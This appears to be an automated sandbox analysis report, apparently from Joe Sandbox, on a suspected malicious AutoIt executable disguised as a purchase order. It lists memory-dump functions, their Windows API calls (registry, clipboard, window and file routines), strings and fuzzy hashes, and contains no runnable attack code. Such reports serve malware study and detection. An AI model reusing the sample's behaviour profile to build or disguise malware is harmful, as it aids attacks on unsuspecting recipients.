                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wcsnicmp
                                  • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                  • API String ID: 1038674560-3360698832
                                  • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                  • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                  • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                  • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                  Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                  • SetCursor.USER32(00000000), ref: 0043075B
                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                  • SetCursor.USER32(00000000), ref: 00430773
                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                  • SetCursor.USER32(00000000), ref: 0043078B
                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                  • SetCursor.USER32(00000000), ref: 004307A3
                                  • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                  • SetCursor.USER32(00000000), ref: 004307BB
                                  • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                  • SetCursor.USER32(00000000), ref: 004307D3
                                  • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                  • SetCursor.USER32(00000000), ref: 004307EB
                                  • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                  • SetCursor.USER32(00000000), ref: 00430803
                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                  • SetCursor.USER32(00000000), ref: 0043081B
                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                  • SetCursor.USER32(00000000), ref: 00430833
                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                  • SetCursor.USER32(00000000), ref: 0043084B
                                  • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                  • SetCursor.USER32(00000000), ref: 00430863
                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                  • SetCursor.USER32(00000000), ref: 0043087B
                                  • SetCursor.USER32(00000000), ref: 00430887
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                  • SetCursor.USER32(00000000), ref: 0043089F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Cursor$Load
                                  • String ID:
                                  • API String ID: 1675784387-0
                                  • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                  • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                  • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                  • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                  Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSysColor.USER32(0000000E), ref: 00430913
                                  • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                  • GetSysColor.USER32(00000012), ref: 00430933
                                  • SetTextColor.GDI32(?,?), ref: 0043093B
                                  • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                  • GetSysColor.USER32(0000000F), ref: 00430959
                                  • CreateSolidBrush.GDI32(?), ref: 00430962
                                  • GetSysColor.USER32(00000011), ref: 00430979
                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                  • SelectObject.GDI32(?,00000000), ref: 0043099C
                                  • SetBkColor.GDI32(?,?), ref: 004309A6
                                  • SelectObject.GDI32(?,?), ref: 004309B4
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                  • 742845F0.USER32(?,000000F0), ref: 00430A09
                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                  • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                  • DrawFocusRect.USER32(?,?), ref: 00430A91
                                  • GetSysColor.USER32(00000011), ref: 00430A9F
                                  • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                  • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                  • SelectObject.GDI32(?,?), ref: 00430AD0
                                  • DeleteObject.GDI32(00000105), ref: 00430ADC
                                  • SelectObject.GDI32(?,?), ref: 00430AE3
                                  • DeleteObject.GDI32(?), ref: 00430AE9
                                  • SetTextColor.GDI32(?,?), ref: 00430AF0
                                  • SetBkColor.GDI32(?,?), ref: 00430AFB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflate$742845FocusMessageRoundSendSolidWindow
                                  • String ID:
                                  • API String ID: 1182366783-0
                                  • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                  • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                  • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                  • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                  Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                  • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CloseConnectCreateRegistry
                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                  • API String ID: 3217815495-966354055
                                  • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                  • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                  • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                  • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                  Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCursorPos.USER32(?), ref: 004566AE
                                  • GetDesktopWindow.USER32 ref: 004566C3
                                  • GetWindowRect.USER32(00000000), ref: 004566CA
                                  • 742845F0.USER32(?,000000F0), ref: 00456722
                                  • 742845F0.USER32(?,000000F0), ref: 00456735
                                  • 74285CF0.USER32(?), ref: 00456746
                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                  • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                  • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                  • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                  • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                  • IsWindowVisible.USER32(?), ref: 0045682C
                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                  • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                  • GetWindowRect.USER32(?,?), ref: 00456873
                                  • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                  • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                  • CopyRect.USER32(?,?), ref: 004568BE
                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$Rect$742845Monitor$74285CopyCreateCursorDesktopFromInfoPointVisible
                                  • String ID: ($,$tooltips_class32
                                  • API String ID: 930342530-3320066284
                                  • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                  • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                  • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                  • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                  Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenClipboard.USER32(?), ref: 0046DCE7
                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                  • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                  • CloseClipboard.USER32 ref: 0046DD0D
                                  • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                  • CloseClipboard.USER32 ref: 0046DD41
                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                  • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                  • CloseClipboard.USER32 ref: 0046DD99
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                  • String ID:
                                  • API String ID: 15083398-0
                                  • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                  • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                  • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                  • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                  Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • GetWindowRect.USER32(?,?), ref: 00471CF7
                                  • GetClientRect.USER32(?,?), ref: 00471D05
                                  • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                  • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                  • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                  • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                  • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                  • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                  • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                  • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                  • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                  • 742859E0.USER32(00000000,000000EB,?), ref: 00471E6E
                                  • GetClientRect.USER32(?,?), ref: 00471E8A
                                  • GetStockObject.GDI32(00000011), ref: 00471EA6
                                  • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                  • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: System$Metrics$Rect$Window$ClientInfoParameters$742859AdjustCreateMessageObjectSendStockTimer_malloc
                                  • String ID: @$AutoIt v3 GUI
                                  • API String ID: 463169423-3359773793
                                  • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                  • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                  • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                  • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                  Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcscat$A1560__wcsicoll_wcscpy_wcslen_wcsncpy
                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                  • API String ID: 2681254697-1459072770
                                  • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                  • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                  • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                  • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                  Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$__wcsnicmp
                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                  • API String ID: 790654849-32604322
                                  • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                  • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                  • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                  • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                  Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                  • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                  • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                  • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                  Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                  • _fseek.LIBCMT ref: 00452B3B
                                  • __wsplitpath.LIBCMT ref: 00452B9B
                                  • _wcscpy.LIBCMT ref: 00452BB0
                                  • _wcscat.LIBCMT ref: 00452BC5
                                  • __wsplitpath.LIBCMT ref: 00452BEF
                                  • _wcscat.LIBCMT ref: 00452C07
                                  • _wcscat.LIBCMT ref: 00452C1C
                                  • __fread_nolock.LIBCMT ref: 00452C53
                                  • __fread_nolock.LIBCMT ref: 00452C64
                                  • __fread_nolock.LIBCMT ref: 00452C83
                                  • __fread_nolock.LIBCMT ref: 00452C94
                                  • __fread_nolock.LIBCMT ref: 00452CB5
                                  • __fread_nolock.LIBCMT ref: 00452CC6
                                  • __fread_nolock.LIBCMT ref: 00452CD7
                                  • __fread_nolock.LIBCMT ref: 00452CE8
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                  • __fread_nolock.LIBCMT ref: 00452D78
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                  • String ID:
                                  • API String ID: 2054058615-0
                                  • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                  • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                  • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                  • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                  Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window
                                  • String ID: 0
                                  • API String ID: 2353593579-4108050209
                                  • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
